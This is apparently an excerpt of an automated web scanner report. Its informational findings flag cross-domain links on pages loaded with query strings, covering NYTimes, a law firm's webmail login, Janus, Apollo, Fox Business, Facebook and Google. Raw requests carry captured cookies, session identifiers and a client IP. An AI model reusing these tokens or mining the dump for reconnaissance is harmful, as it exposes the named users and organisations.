Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1; nyt-m=D5A6A596AEC66C101E6FF77DE512588B&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.11.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:15:57 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...
SiteSearchQ111-1694922-nyt1&ad=NEW.88x31.SiteSearch.Wizard&goto=http://ad.doubleclick.net/jump/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.15.57" TARGET="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.15.57"
BORDER=0 WIDTH=88 HEIGHT=31
ALT="Click Here">
</A>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<noscript>
   <img height="1" width="1" border="0" src="http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript" />
</noscript>
<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 125px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 9px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</a> <a href="http://www.nytco.com/">The New York Times Company</a>
...[SNIP]...
<li><a href="http://www.nytco.com/career.html">Work for Us</a>
...[SNIP]...
<li><a href="http://www.nytimes.whsites.net/mediakit/">Advertise</a>
...[SNIP]...

19.30. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; _chartbeat2=0b2fi2bgk284tw0q; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=2C6EA0974B7E4DBF1FAB9FF2C27C8FEF&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:40:04 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:40:04 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:2; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...
SiteSearchQ111-1694922-nyt1&ad=NEW.88x31.SiteSearch.Wizard&goto=http://ad.doubleclick.net/jump/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.40.04" TARGET="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.40.04"
BORDER=0 WIDTH=88 HEIGHT=31
ALT="Click Here">
</A>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<noscript>
   <img height="1" width="1" border="0" src="http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript" />
</noscript>
<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 125px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 9px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</a> <a href="http://www.nytco.com/">The New York Times Company</a>
...[SNIP]...
<li><a href="http://www.nytco.com/career.html">Work for Us</a>
...[SNIP]...
<li><a href="http://www.nytimes.whsites.net/mediakit/">Advertise</a>
...[SNIP]...

19.31. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail.tuckerellis.com
Path:   /exchweb/bin/auth/owalogon.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0 HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://webmail.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 8890
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:47 GMT


<!-- {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights reserved.-->
<HTML >
...[SNIP]...
<CENTER>
                   <script src=https://seal.verisign.com/getseal?host_name=webmail.tuckerellis.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

19.32. https://ww3.janus.com/advisor/about-janus

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /advisor/about-janus

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /advisor/about-janus?WT.mc_id=102162&WT.srch=1 HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server:
Cache-Control: no-store
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 11:15:36 GMT
Set-Cookie: vj-ww3-advisor=3557560492.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 26435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...
<li><a
       href="https://www.janusinternational.com/" onclick="trackFooter('https://www.janusinternational.com/', 'Offsite:Footer:Non-US Investment Professional Link-out');">
Non-US Investment Professional</a>
...[SNIP]...
<li><a href="https://www.janusintech.com/Janus/Insti/jiam?command=feedback&amp;source=IPSS" onclick="trackFooter('https://www.janusintech.com/Janus/Insti/jiam?command=feedback&amp;source=IPSS', 'Footer:Feeback Link-out');">Feedback</a>
...[SNIP]...

19.33. http://www.apolloglobal.us/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apolloglobal.us
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=20&Itemid=34 HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:33:10 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
X-Powered-By: PHP/5.2.3-1ubuntu6.4
Set-Cookie: b01a8bbc2b6e57a153d5c05069526f2b=a3b2a52a7ef8a8f9e10abb2501b30b93; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 09:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<noscript>
       <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="440" height="110">
   <param name="movie" value="/templates/global/images/logo_ap.swf" />
...[SNIP]...
<td colspan="2">
<object height="200" width="950" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="src" value="/images/stories/flash/video-new.swf" />
...[SNIP]...
<div>
                                           <object height="220" width="240" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="src" value="/images/stories/flash/mini_map_logo-new.swf" />
...[SNIP]...
<br/><a rel="nofollow" onclick="window.open('http://reddit.com/submit?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://reddit.com" title="Reddit!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/reddit.png" alt="Reddit!" title="Reddit!" /></a> <a rel="nofollow" href="http://del.icio.us/" title="Del.icio.us!" target="_blank" onclick="window.open('http://del.icio.us/post?v=4&noui&jump=close&url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/delicious.png" alt="Del.icio.us!" title="Del.icio.us!" /></a> <a rel="nofollow" onclick="window.open('http://www.google.com/bookmarks/mark?op=edit&bkmk=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://www.google.com/bookmarks/" title="Google!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/google.png" alt="Google!" title="Google!" /></a> <a rel="nofollow" onclick="window.open('https://favorites.live.com/quickadd.aspx?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="https://favorites.live.com/" title="Live!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/live.png" alt="Live!" title="Live!" /></a> <a rel="nofollow" onclick="window.open('http://www.facebook.com/sharer.php?u=' + encodeURIComponent('http://www.apolloglobal.us') + '&t=' + encodeURIComponent('Global Management') + ''); return false;" href="https://www.facebook.com/" title="Facebook!" 
target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/facebook.png" alt="Facebook!" title="Facebook!" /></a> <a rel="nofollow" onclick="window.open('http://www.stumbleupon.com/submit?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://www.stumbleupon.com/" title="StumbleUpon!" target="_blank"><img src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/stumbleupon.png" alt="StumbleUpon!" title="StumbleUpon!" /></a> <a rel="nofollow" onclick="window.open('http://myweb2.search.yahoo.com/myresults/bookmarklet?u=' + encodeURIComponent('http://www.apolloglobal.us') + '&t=' + encodeURIComponent('Global Management') + ''); return false;" href="http://myweb2.search.yahoo.com/" title="Yahoo!" target="_blank"><img src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/yahoo.png" alt="Yahoo!" title="Yahoo!" /></a> <a href="http://joomladigger.com/" title="Add any social bookmarking button to your blog."><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/joomladigger.png" alt="Free social bookmarking plugins and extensions for Joomla! websites!" title="Bo
...[SNIP]...
<td><a href="http://www.apollogrp.edu" target="_blank"><img src="/templates/global/images/logo-apollo-group.gif" border="0" align="right" />
...[SNIP]...

19.34. http://www.butlerrubin.com/web/br.nsf/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/index

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /web/br.nsf/index?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:25 GMT
Last-Modified: Thu, 12 May 2011 12:21:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12175
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nation
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.35. http://www.digiware.net/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digiware.net
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=95&Itemid=0 HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9685


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/index.php?option=com_content&amp;view=article&amp;id=100&amp;Itemid=149">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="950" height="196" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
<param name="src" value="/images/stories/bannerprovhome.swf" />
...[SNIP]...
<area shape="rect" coords="314,6,622,137" href="http://securelab.digiware.net/" target="_blank" />
<area shape="rect" coords="621,5,950,136" href="http://www.condorlabs.net/" target="_blank" />
</map>
...[SNIP]...

19.36. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.48
X-Cnection: close
Date: Thu, 12 May 2011 10:59:38 GMT
Content-Length: 8669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.37. http://www.foxbusiness.com/static/all/js/ad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxbusiness.com
Path:   /static/all/js/ad.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /static/all/js/ad.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c34030-7ce9-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2723
Date: Thu, 12 May 2011 11:38:09 GMT
Connection: close
Content-Length: 31977

//Integration Services - v 0.99
var ad = {
   _tile: 0,
   ord: Math.floor(999999999*Math.random()),
dc: {
_svr: "http://ad.doubleclick.net",
_method: "adj",
       _url: "",
       _kw
...[SNIP]...
</scr"+ "ipt>";//document.write(\"<iframe src='http://www.google.com'></iframe>
...[SNIP]...

19.38. http://www.foxbusiness.com/static/all/js/head.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxbusiness.com
Path:   /static/all/js/head.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /static/all/js/head.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c34019-75f8-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2820
Date: Thu, 12 May 2011 11:38:17 GMT
Connection: close
Content-Length: 30200

/***** Header Script *****//*
Updated: 1/31/2011
Header script functions

To search for a specific prototype, search the keyword:
- Authentication: fn.authentication
- Weather Section: fn.weather
- O
...[SNIP]...
omain); } catch(err) { showToConsole("[head.authentication] Logout - An error occured: " + err); }
                               return false;
                           });
                           $(this).html(logoutLink);
                       });
                       
                       usrElm.html('<img src="http://www.foxnews.com/static/all/img/head/profile.png" alt="" /> ' + as.getDisplayName());
                       usrElm.css({ display:"inline" });
                   } else {
                       auth = accntElm.find(".user-options >
...[SNIP]...

19.39. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78506

<!doctype html> <head> <title>Porter Wright Morris &amp; Arthur - Google Search</title> <script>window.google={kEI:"wNDLTcyvKqby0gGL0Yj6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Porter+Wright+Morris+%26+Arthur&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/people/" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.porterwright.com/contactus/" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoATAA')">Contact Us</a>
...[SNIP]...
